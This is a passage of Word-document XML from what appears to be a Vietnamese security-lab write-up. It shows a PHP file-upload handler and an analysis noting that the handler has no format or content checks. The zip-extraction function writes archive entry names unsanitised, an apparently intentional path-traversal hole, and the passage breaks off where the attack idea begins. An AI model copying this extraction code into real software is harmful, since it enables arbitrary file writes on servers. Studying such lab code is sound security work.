              <w:t>][</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"name"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="511D223B" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">(substr($file_name,-4,4) == </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>".zip"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B70846" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39C55346" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            $result = _unzip_file_ziparchive($_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"file"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>][</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"tmp_name"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>],$dir);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62188935" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62549BDB" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62EC0616" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B2588E" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            $newFile = $dir . </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> . $file_name;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BFBFBE7" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            move_uploaded_file($_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"file"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>][</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"tmp_name"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>], $newFile);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CFBAF39" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7E0388" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="735A72D6" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">       } </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>catch</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>(Exception $e) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FF47473" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            $error = $e-&gt;getMessage();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10245199" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">         }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C5B0AC2" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB8ACD0" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66CA7676" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> _unzip_file_ziparchive($file, $to)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002F70FA" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370DCDB5" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        $z = </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> ZipArchive();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27997D03" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        $zopen = $z-&gt;open( $file, ZipArchive::CHECKCONS);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465D9F4D" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> ( </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> !== $zopen )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B52431" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103A2FC4" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> ( $i = 0; $i &lt; $z-&gt;numFiles; $i++ ) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23471C04" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A0A8690" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> ( ! $info = $z-&gt;statIndex($i) )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D93C9A" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>//Could not retrieve file from archive.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28F67DD8" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13468D28" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> ( </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'/'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> == substr($info[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'name'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">], -1) ) </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// directory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A1F3AA" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>continue</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="240D7E77" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34B951D1" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            $contents = $z-&gt;getFromIndex($i);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4484920F" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> ( </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> === $contents )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE42473" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>//Could not extract file from archive.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47572D96" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="767CBD37" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">(file_exists(dirname($to . </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> . $info[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'name'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">]))){ </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// directory exists</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A73CC23" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">                file_put_contents($to . </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> . $info[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'name'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>], $contents);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="376B1695" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="224E30FE" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CBA321A" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E20E143" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        $z-&gt;close();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6ED507" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CEF59F8" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555B2C33" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6891B5C9" w14:textId="73702DFB" w:rsidR="004F0B2A" w:rsidRDefault="004F0B2A" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F0B2A">
        <w:t xml:space="preserve">Đoạn </w:t>
      </w:r>
      <w:r w:rsidR="00D05851">
        <w:t>co</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0B2A">
        <w:t>de cung cấp thực hiện hai chức năng chính: xử lý upload file và giải nén file .zip vào một thư mục tạm được tạo riêng cho mỗi phiên làm việc. Dưới đây là phân tích chi tiết:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9FE7D5" w14:textId="5A785A2A" w:rsidR="00D05851" w:rsidRPr="00D05851" w:rsidRDefault="00D05851" w:rsidP="00D05851">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D05851">
        <w:t>Nếu file có phần mở rộng .zip, nó sẽ được giải nén bằng hàm _unzip_file_ziparchive.</w:t>
      </w:r>
      <w:r w:rsidR="00E150DF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D9180" w14:textId="653918C6" w:rsidR="00D05851" w:rsidRDefault="00D05851" w:rsidP="00D05851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D05851">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nếu không, file sẽ được lưu trực tiếp vào thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00E150DF">
        <w:t>phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E27E0" w14:textId="1F0B5039" w:rsidR="00E150DF" w:rsidRPr="00D05851" w:rsidRDefault="00E150DF" w:rsidP="00D05851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E150DF">
        <w:t xml:space="preserve">Không có kiểm tra định dạng hoặc nội dung </w:t>
      </w:r>
      <w:r>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063BA144" w14:textId="388455FF" w:rsidR="00E150DF" w:rsidRDefault="00D05851" w:rsidP="00E150DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D05851">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Mỗi file trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05851">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05851">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> được trích xuất và ghi vào thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00E150DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7431378A" w14:textId="79B36EBF" w:rsidR="004F0B2A" w:rsidRDefault="00E150DF" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ngoài ra hệ thống cũng được config như các bài trước để không thể thực hiện chạy file php trong thư mục upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B1A3AF" w14:textId="77777777" w:rsidR="002211DC" w:rsidRDefault="002211DC" w:rsidP="002211DC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1BB84" w14:textId="53BCA38F" w:rsidR="00AC03A8" w:rsidRPr="00AC03A8" w:rsidRDefault="00AC03A8" w:rsidP="00AC03A8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03A8">
